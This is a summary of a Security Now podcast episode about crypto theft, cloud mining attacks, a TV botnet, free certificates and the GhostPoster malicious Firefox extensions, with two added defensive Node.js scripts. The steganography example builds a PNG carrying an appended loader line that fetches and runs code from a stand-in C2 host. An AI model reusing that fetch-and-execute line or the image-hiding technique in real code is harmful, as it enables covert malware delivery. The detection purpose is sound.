Security Now #1057: GhostPoster - Free VPNs, Hidden Risks
Recorded: December 23, 2025 | Hosts: Steve Gibson & Leo Laporte
Episode Overview
Steve Gibson and Leo Laporte close out 2025 with a packed episode focused on the hidden dangers of browser extensions—especially “free” VPN add-ons—and how a new malware campaign dubbed "GhostPoster" infected 50,000 Firefox users via a steganographically-hidden payload in a seemingly harmless image. The show also dives into:
- North Korea's record-breaking cryptocurrency thefts,
- The persistent risk of insecure Docker server deployments,
- Amazon AWS cloud mining attacks,
- The emergence of a colossal Android-based smart TV botnet (Kim Wolf),
- The evolving realities of free certificate infrastructures like Let's Encrypt.
The episode delivers both technical insight and practical security hygiene advice for end-users and professionals.
Key Discussion Points and Insights
1. North Korea’s Rise as a Cybercrime Superpower
[14:18 – 38:15]
- Massive Hauls: North Korean government-backed hackers stole $2 billion in cryptocurrency in 2025—a single-year record, pushing their all-time total to $6.75 billion.
- Tactics Evolved:
- Fewer intrusions, but far larger sums taken per breach.
- Deceptive social engineering: placing North Korean IT workers inside target companies, posing as recruiters in phishing campaigns, and running elaborate credential-harvesting schemes.
- Money Laundering Networks:
- Laundering runs through Chinese-language mixing services, cross-chain bridges, and splitting the proceeds across many blockchains.
- Individual Wallet Attacks:
- 158,000 wallet compromises affecting 80,000 victims in 2025, although the total value stolen from individuals dropped compared to 2024.
- Key Quote:
“We have a hyper-aggressive, state-backed hacking community that is, I’m sure, where speaking English with as little accent as possible is highly valued, doing everything they can think of... to separate us from that income.” – Steve Gibson [29:40]
- Security Recommendation:
- Move cryptocurrency to offline wallets wherever possible; don’t leave significant funds in online wallets or exchanges.
2. Insecure Cloud and Docker Deployments: Mining the Miners
[40:09 – 55:38]
- AWS Campaigns:
- Attackers used leaked AWS access keys to quickly launch cryptocurrency miners on EC2 instances and ECS tasks.
- For persistence they enabled EC2 termination protection (the DisableApiTermination instance attribute) on their miners, so a responder's terminate-instances calls fail until the attribute is turned back off; clearing it is the first remediation step.
- Malicious Docker Images:
- A Docker Hub image bundling SRBMiner-MULTI (a legitimate multi-algorithm mining utility) was used to turn thousands of hosts into miners.
- The attackers got in through Docker Remote API endpoints exposed to the internet; Docker's own documentation warns never to expose the daemon over TCP without TLS client authentication.
- The Golden Rule:
“Never rely upon the strength of remote authentication. Period.” – Steve Gibson [54:31]
- User Advice:
- Don’t expose the Docker API publicly; keep the daemon on its local Unix socket, or put TCP access behind a VPN or firewall and require TLS client certificates (tlsverify).
- Don’t treat a service's own remote authentication as sufficient protection for critical infrastructure; network isolation comes first.
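The termination-protection trick above leaves a clear trail in CloudTrail. As an added example (not code from the episode or from AWS), here is a small Node.js triage script that walks CloudTrail records, flags every ModifyInstanceAttribute call that turned DisableApiTermination on, rates it by whether the key that made the call or launched the instance is one we recognise, and emits the cleanup commands in the order they must run. The records are constructed for illustration: their field layout follows CloudTrail's JSON (userIdentity, eventName, requestParameters, responseElements), but every instance ID, access key ID, user name and IP address is made up, and KNOWN_ACCESS_KEYS is an assumed allowlist of the account's legitimate keys.

```javascript
// Added example: triage CloudTrail records for the EC2 termination-protection
// persistence trick. Not code from the episode or from AWS.
// Sample records are constructed for illustration: the field layout follows
// CloudTrail's JSON, but every ID, key, user name and address is made up.

// Assumption: the account's legitimate access keys (a made-up allowlist).
const KNOWN_ACCESS_KEYS = new Set(["AKIAEXAMPLEDEPLOYER"]);

const sampleTrail = [
  {
    eventTime: "2025-12-20T03:11:02Z",
    eventSource: "ec2.amazonaws.com",
    eventName: "RunInstances",
    sourceIPAddress: "198.51.100.23",
    userIdentity: { type: "IAMUser", userName: "ci-deploy", accessKeyId: "AKIAEXAMPLELEAKED01" },
    requestParameters: { instanceType: "c6i.24xlarge" },
    responseElements: { instancesSet: { items: [{ instanceId: "i-0aa11bb22cc33dd44" }] } },
  },
  {
    eventTime: "2025-12-20T03:11:40Z",
    eventSource: "ec2.amazonaws.com",
    eventName: "ModifyInstanceAttribute",
    sourceIPAddress: "198.51.100.23",
    userIdentity: { type: "IAMUser", userName: "ci-deploy", accessKeyId: "AKIAEXAMPLELEAKED01" },
    requestParameters: { instanceId: "i-0aa11bb22cc33dd44", disableApiTermination: { value: true } },
  },
  {
    eventTime: "2025-12-20T09:00:00Z",
    eventSource: "ec2.amazonaws.com",
    eventName: "ModifyInstanceAttribute",
    sourceIPAddress: "203.0.113.8",
    userIdentity: { type: "IAMUser", userName: "ops-admin", accessKeyId: "AKIAEXAMPLEDEPLOYER" },
    requestParameters: { instanceId: "i-0ee55ff66aa77bb88", disableApiTermination: { value: true } },
  },
];

function isEc2(rec, eventName) {
  return rec.eventSource === "ec2.amazonaws.com" && rec.eventName === eventName;
}

// True when the record turned termination protection on for an instance.
function enablesTerminationProtection(rec) {
  return isEc2(rec, "ModifyInstanceAttribute") &&
    rec.requestParameters?.disableApiTermination?.value === true;
}

// Instance IDs created by a RunInstances call (taken from its responseElements).
function launchedInstanceIds(rec) {
  if (!isEc2(rec, "RunInstances")) return [];
  const items = rec.responseElements?.instancesSet?.items ?? [];
  return items.map((i) => i.instanceId);
}

// Cleanup order matters: kill the key, clear the flag, then terminate.
function remediationCommands(userName, accessKeyId, instanceId) {
  return [
    `aws iam update-access-key --user-name ${userName} --access-key-id ${accessKeyId} --status Inactive`,
    `aws ec2 modify-instance-attribute --instance-id ${instanceId} --no-disable-api-termination`,
    `aws ec2 terminate-instances --instance-ids ${instanceId}`,
  ];
}

function triage(records) {
  // Pass 1: which instances were launched by keys we do not recognise?
  const launchedByUnknownKey = new Set();
  for (const rec of records) {
    const key = rec.userIdentity?.accessKeyId;
    if (!KNOWN_ACCESS_KEYS.has(key)) {
      launchedInstanceIds(rec).forEach((id) => launchedByUnknownKey.add(id));
    }
  }
  // Pass 2: every termination-protection change, rated by who did it and to what.
  const findings = [];
  for (const rec of records) {
    if (!enablesTerminationProtection(rec)) continue;
    const id = rec.requestParameters.instanceId;
    const key = rec.userIdentity?.accessKeyId;
    const suspicious = !KNOWN_ACCESS_KEYS.has(key) || launchedByUnknownKey.has(id);
    findings.push({
      time: rec.eventTime,
      instanceId: id,
      accessKeyId: key,
      sourceIp: rec.sourceIPAddress,
      severity: suspicious ? "high" : "info",
      remediation: suspicious ? remediationCommands(rec.userIdentity.userName, key, id) : [],
    });
  }
  return findings;
}

console.log(JSON.stringify(triage(sampleTrail), null, 2));
```

The generated commands are the standard AWS CLI calls. Deactivating the leaked key comes first so the attacker cannot simply re-enable protection, and the attribute must be cleared before terminate-instances will succeed. In a real investigation the same query should be run over the full lookback window, since the miners may have been launched days before the first protection change.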
3. Kim Wolf — The Smart TV Super-Botnet
[63:47 – 89:47]
- Discovery:
- Researchers found a global botnet (Kim Wolf) with at least 1.8 million Android TV devices infected, potentially capable of 30 terabits per second of DDoS.
- Capabilities:
- Beyond typical DDoS: includes proxy forwarding, remote shell, and file management.
- Uses DNS over TLS, elliptic-curve digital signatures, and ENS (Ethereum Name Service) records to make its C2 infrastructure resilient.
- Infection Demographics:
- Most infected devices: Brazil (14.6%), India (12.7%), USA (9.6%).
- Warning:
- Cheap or off-brand Android TV boxes are highly susceptible: they rarely receive firmware updates and were never designed with security in mind.
- Key Quote:
“Attackers can use controlled terminals to insert tampered, biased or extreme videos... they can insert content without written permission, violating the contract between the viewer and the TV provider and is illegal.” – Steve Gibson reading research [88:35]
- Advice:
- Only buy TV boxes from reputable brands, maintain firmware updates, avoid unknown APKs, and use strong, unique device passwords.
4. Let’s Encrypt, Free Certificates, and Centralization
[95:27 – 113:50]
- Free Domain-Validated Certificates:
- Let’s Encrypt now supplies about two-thirds of all web certificates; Google also quietly offers free certificates.
- The foundations of free certificate infrastructure are philanthropic: funded by Google, Mozilla, Cisco, Meta, and others.
- Risks and Trust:
- Centralization brings worries: if Let's Encrypt faltered, a large share of the web's TLS would be affected, but it has strong backing and is essential to modern web security.
- EV Certificates Are Over:
“There’s no point for having EV certificates, there’s no point for having EV code signing. All of that is drained out of the system.” – Steve Gibson [108:43]
- Recommendation:
- For most, domain-validated free certificates are sufficient; donate to Let’s Encrypt as you would to Wikipedia.
5. Main Story: “GhostPoster” — PNG Steganography Powers Massive Firefox Extension Attack
[121:08 – 137:12]
- Discovery:
- KOI Security researchers found 17 malicious Firefox extensions (over 50,000 installs in total), mostly “free VPN” and utility extensions, that hid JavaScript malware inside their logo PNGs using steganography.
- How the Attack Works:
- The extension's logo PNG carries JavaScript hidden after a “===” marker, so the file still opens as an ordinary image while carrying code.
- On load, the extension reads the image, extracts the loader, and executes it; the loader checks in with the C2 servers, which decide whether to hand it the real malware.
- Multi-stage and probabilistic: the real payload is never in the extension package but fetched from the C2, and only with about a 10% chance at each 48-hour check-in after an initial 6-day delay, so most sandbox and forensic runs see nothing malicious.
- Malware Functions:
- Affiliate commission hijacking (steals e-commerce commissions)
- Browser-wide tracking (injects Google Analytics across pages)
- Strips security response headers (Content-Security-Policy, X-Frame-Options), exposing users to XSS and clickjacking
- Invisible iframe injection for ad/click fraud
- CAPTCHA bypass via overlays and external solvers
- Extensions List Includes:
- Free VPN Forever, Free MP3 Downloader, Translation tools, Weather, Ad Blockers, Mouse Gestures, etc.
- Key Quote:
“The real threat is simpler: 50,000 users installed extensions that gave attackers full control over their browsers. And these extensions are still live…” – Steve Gibson [136:10], reading KOI report
- Advice:
- Only install essential, well-vetted browser extensions.
- Routinely audit and uninstall unused or unfamiliar ones.
- Avoid “Free” VPN/browser tools—assume malicious unless proven otherwise.
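The carrier technique in the list above, as an added example that is not the KOI report's or the malware's own code: a Node.js script that builds a tiny valid PNG, appends a JavaScript string after a “===” marker the way the summary describes, and then scans the result. The scanner walks the chunk table to IEND, verifies each chunk's CRC, and reports any bytes after IEND plus whatever follows the marker. Image decoders stop at IEND, so trailing bytes never affect rendering, which is what keeps the carrier inconspicuous. The hidden string, the MARKER constant and the placement immediately after IEND are assumptions made for illustration; real samples may differ.

```javascript
// Added example: build a PNG with code appended past IEND, then detect it.
// Not code from the episode, the KOI report or the malware. The marker,
// its placement and the hidden string are assumptions made for illustration.

const PNG_SIG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const MARKER = "==="; // marker the summary describes; assumed to sit right after IEND

// Standard CRC-32 as used by PNG chunks (reflected polynomial 0xEDB88320).
function crc32(bytes) {
  let c = 0xffffffff;
  for (const b of bytes) {
    c ^= b;
    for (let k = 0; k < 8; k++) c = (c >>> 1) ^ (0xedb88320 & -(c & 1));
  }
  return (c ^ 0xffffffff) >>> 0;
}

// Serialise one chunk: length, type, data, CRC over type+data.
function chunk(type, data) {
  const len = Buffer.alloc(4);
  len.writeUInt32BE(data.length, 0);
  const typeAndData = Buffer.concat([Buffer.from(type, "ascii"), data]);
  const crc = Buffer.alloc(4);
  crc.writeUInt32BE(crc32(typeAndData), 0);
  return Buffer.concat([len, typeAndData, crc]);
}

// A valid 1x1 8-bit greyscale PNG (constructed; the IDAT is one stored zlib block).
const cleanLogo = Buffer.concat([
  PNG_SIG,
  chunk("IHDR", Buffer.from([0, 0, 0, 1, 0, 0, 0, 1, 8, 0, 0, 0, 0])),
  chunk("IDAT", Buffer.from([0x78, 0x01, 0x01, 0x02, 0x00, 0xfd, 0xff, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01])),
  chunk("IEND", Buffer.alloc(0)),
]);

// Placeholder loader text (constructed, hypothetical host); a real loader would
// fetch its second stage from the C2 and run it.
const hiddenLoader = "fetch('https://c2.example/stage2').then(r => r.text()).then(src => new Function(src)())";
const taintedLogo = Buffer.concat([cleanLogo, Buffer.from(MARKER + hiddenLoader, "utf8")]);

// Walk the chunk table to IEND, check CRCs, and report what comes after IEND.
function scanPng(buf) {
  if (!buf.subarray(0, 8).equals(PNG_SIG)) throw new Error("not a PNG");
  const chunks = [];
  const badCrc = [];
  let pos = 8;
  let sawIend = false;
  while (pos + 12 <= buf.length) {
    const len = buf.readUInt32BE(pos);
    const type = buf.toString("ascii", pos + 4, pos + 8);
    const end = pos + 12 + len;
    if (end > buf.length) break; // truncated chunk
    if (crc32(buf.subarray(pos + 4, end - 4)) !== buf.readUInt32BE(end - 4)) badCrc.push(type);
    chunks.push(type);
    pos = end;
    if (type === "IEND") { sawIend = true; break; }
  }
  const trailing = sawIend ? buf.subarray(pos) : Buffer.alloc(0);
  const at = trailing.indexOf(MARKER);
  return {
    chunks,
    badCrc,
    sawIend,
    trailingBytes: trailing.length,
    hiddenText: at >= 0 ? trailing.toString("utf8", at + MARKER.length) : null,
  };
}

console.log(scanPng(cleanLogo));
console.log(scanPng(taintedLogo));
```

Run scanPng over every PNG in an unpacked extension (an .xpi is a zip archive). Any trailing bytes after IEND, a failed CRC, or a marker hit deserves a manual look. The chunk list is reported as well because a more careful author can hide data inside ancillary chunks (tEXt, zTXt, or private chunk types) rather than after IEND, and those would pass a trailing-bytes check.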
Notable Quotes & Moments
- On State-Sponsored Attacks:
“The bad guys want our money. And sadly, today’s security isn’t strong enough to keep them from finding ways to get it.” – Steve Gibson [58:35]
- On User Security Hygiene:
“Do everything you can to limit your usage to extensions you really need. Get rid of any you downloaded thinking you’d use but haven’t.” – Steve Gibson [137:06]
- On Security Culture:
“The lesson we learn about humanity is, someone who really wants something really bad—who just keeps pushing—often gets it.” – Steve Gibson [138:10]
Timestamps for Important Segments
- Crypto Crime & North Korea: [14:18 – 38:15]
- AWS & Docker Crypto Mining Risks: [40:09 – 55:38]
- Kim Wolf TV Botnet: [63:47 – 89:47]
- Let’s Encrypt & Free Certificates: [95:27 – 113:50]
- Main Story: GhostPoster Attack: [121:08 – 137:12]
Takeaways & Recommendations
- Always treat browser extensions—especially “free” ones—with skepticism.
- Don’t expose infrastructure or admin APIs to internet access without strong containment.
- Move significant cryptocurrency to offline storage.
- Avoid untrusted/cheap Android TV devices, keep firmware updated, use strong passwords.
- If you benefit from free web infrastructure like Let’s Encrypt, consider supporting it financially.
Security Now returns in 2026 with more cutting-edge security insights. Have a safe and secure New Year!